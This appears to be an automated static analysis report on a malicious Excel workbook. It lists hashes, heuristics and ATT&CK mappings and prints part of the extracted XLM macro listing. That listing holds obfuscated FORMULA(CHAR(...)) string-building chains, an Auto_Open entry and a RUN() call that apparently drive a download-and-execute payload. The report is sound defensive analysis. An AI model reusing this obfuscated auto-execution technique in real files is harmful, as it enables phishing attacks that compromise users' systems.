Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8fe323561b6725ab…

MALICIOUS

Office (OLE)

235.0 KB Created: 2020-05-21 07:36:35 Authoring application: Microsoft Excel First seen: 2020-09-15
MD5: cdd1f1e592d13677cc352499748eb026 SHA-1: 6b22c2beefaa045adbbeed4205c2b9a3a58e6ce7 SHA-256: 8fe323561b6725ab567b768a754819a5468c9e054fa99fc7613fdb957234af51
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains critical heuristics indicating obfuscated Excel 4.0 (XLM) macros with an Auto_Open execution chain. The XLM macro sheet is designed to automatically execute upon opening, likely to download and run a secondary payload. The obfuscation and auto-execution chain suggest a malicious intent to compromise the user's system.

Heuristics 3

  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • Obfuscated XLM Auto_Open execution chain critical OLE_XLM_OBFUSCATED_AUTOEXEC_CHAIN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and an obfuscated formula execution chain. The macro builds strings through FORMULA(CHAR(...)), primes state with SET.VALUE / GET.CELL / GOTO, and transfers control through RUN(). This is a high-confidence XLM malware pattern.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 129556 bytes
SHA-256: abe349040aba016a7b3c153f6e49451bb7cc8bcbc6d0544261f99254dc93ea45
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Sheet
' 0018     28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d  Sheet!HJ41083 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  Sheet,DF62,"",-0.12121212121212121549
'  Sheet,CZ73,"",39.00000000000000000000
'  Sheet,FY104,"",-1.76703296703296719450
'  Sheet,HY146,"",-1.25000000000000000000
'  Sheet,GG160,"",430.00000000000000000000
'  Sheet,BJ174,"",743.00000000000000000000
'  Sheet,DF265,"",2.48275862068965524898
'  Sheet,JG283,"",-67.75000000000000000000
'  Sheet,IY298,"",1.18343195266272194210
'  Sheet,DS407,"",11.44927536231883991036
'  Sheet,S419,"",42.00000000000000000000
'  Sheet,CE422,"",-251.87500000000000000000
'  Sheet,E452,"",2887.50000000000000000000
'  Sheet,JN483,"",221.80015624999998635758
'  Sheet,D522,"",-31.25000000000000000000
'  Sheet,IB557,"",0.09367088607594936667
'  Sheet,EH567,"",-0.23324396782841821940
'  Sheet,JI607,"",1.73399014778325133435
'  Sheet,CR634,"FORMULA(CHAR(IK65504/EM59286)&CHAR(BP19117*EX20403)&CHAR(IK65504*FX2146)&CHAR(W45736*IA42047)&CHAR(FR31649+DX17536)&CHAR(HJ62720*IU5737)&CHAR(BP19117-GL39864)&CHAR(IK65504*JK20164)&CHAR(IK65504/CP38949)&CHAR(DL37019/HU47611)&CHAR(IA63888*GE63648)&CHAR(FR31649-EW7413)&CHAR(HJ62720-DX44823)&CHAR(CU46567/FZ26423)&CHAR(DL37019/EW33313)&CHAR(FR31649+II26387)&CHAR(HJ62720*FH31320)&CHAR(IA63888-BR44653)&CHAR(W45736-FW1250)&CHAR(FR31649*HA16013)&CHAR(CU46567+DA17691)&CHAR(IK65504*GO17900)&CHAR(BP19117/BN1394)&CHAR(JF7947*DY65004)&CHAR(FR31649-CA64180)&CHAR(IA63888/HV22928)&CHAR(FR31649/BW26240)&CHAR(FR31649-CL60221)&CHAR(CU46567/CV61521)&CHAR(FR31649-X4280)&CHAR(IK65504-EI11987)&CHAR(HJ62720+BH64300)&CHAR(W45736*CH46420)&CHAR(IK65504+DT17737)&CHAR(HJ62720-ET47799)&CHAR(BP19117*GX39054)&CHAR(JF7947-GO19933)&CHAR(CZ9923+IH2192)&CHAR(DL37019+DL53950)&CHAR(IA63888+DH35870)&CHAR(W45736+JJ47413)&CHAR(IA63888+HY146)&CHAR(JF7947*JU53200)&CHAR(IA63888*GH48770)&CHAR(DL37019*BH41645)&CHAR(IK65504+BW47145)&CHAR(CZ9923+DJ8113)&CHAR(DL37019*HM32614)&CHAR(FR31649*BM6675)&CHAR(DL37019*BO10322)&CHAR(CZ9923*BP16132)&CHAR(JF7947+FJ29242)&CHAR(FR31649*HD41584)&CHAR(HJ62720*HR11162)&CHAR(CZ9923+FM58474)&CHAR(IA63888-DX15304)&CHAR(CZ9923*BA46851)&CHAR(BP19117/EE19324)&CHAR(JF7947+CF51941)&CHAR(BP19117+IV41650)&CHAR(HJ62720/GK24123)&CHAR(IK65504+EX18976)&CHAR(FR31649/BW43462)&CHAR(DL37019*V25219)&CHAR(FR31649-JJ5622)&CHAR(DL37019*FY57927),CR635)",""
'  Sheet,CR636,RUN(JK28376),""
'  Sheet,CC658,"",-15.66666666666666607455
'  Sheet,HH692,"",0.14886731391585761308
'  Sheet,GX704,"",-0.08823529411764706454
'  Sheet,CI784,"",525.00000000000000000000
'  Sheet,DN834,"",-0.06666666666666666574
'  Sheet,JL847,"",-0.04347826086956521618
'  Sheet,BS861,"",-18.25000000000000000000
'  Sheet,DY891,"",-6.72131147540983597821
'  Sheet,BY1005,"FORMULA(CHAR(IP35977+GT17365)&CHAR(GV44362/FR19047)&CHAR(FH14172*JR43513)&CHAR(DG41916*IC50744)&CHAR(GV44362/CZ61393)&CHAR(IP35977/DL50895)&CHAR(IP35977*CG51370)&CHAR(IP35977*DU43010)&CHAR(JN43798-GS33389)&CHAR(JN43798-JL11425)&CHAR(IP35977+BM11538)&CHAR(GV44362/ER33989)&CHAR(JN43798/ED47100)&CHAR(EL38993+CX14477)&CHAR(JN43798-CC4535)&CHAR(EL38993+DB8427)&CHAR(GP11726/BC26024)&CHAR(JS19592-FR18862)&CHAR(JS19592/FZ62773)&CHAR(JN43798/HR35833)&CHAR(GV44362+EU43819)&CHAR(FH14172-FW52006)&CHAR(IP35977-EC63139)&CHAR(GV44362/O21374)&CHAR(EL38993+FN50518)&CHAR(EL38993*FT21220)&CHAR(JS19592*DT23756)&CHAR(JN43798-HQ40134)&CHAR(GV44362/IS35172)&CHAR(IP63702-FM46647)&CHAR(GV44362/BR2011)&CHAR(IP35977-FK1679)&CHAR(GV44362-CS19368)&CHAR(IP35977/BQ18889)&CHAR(GV44362-S62471)&CHAR(FH14172+FB11499)&CHAR(FH14172-GF13152)&CHAR(FH14172/BV8701)&CHAR(DG41916*O34127)&CHAR(GP11726*CN11348)&CHAR(GP11726+CM6759)&CHAR(GV44362+CX62535)&CHAR(GV44362+HI19007)&CHAR(FH14172-H8323)&CHAR(JN43798+S36338)&CHAR(GD57281/GM3141
... (truncated)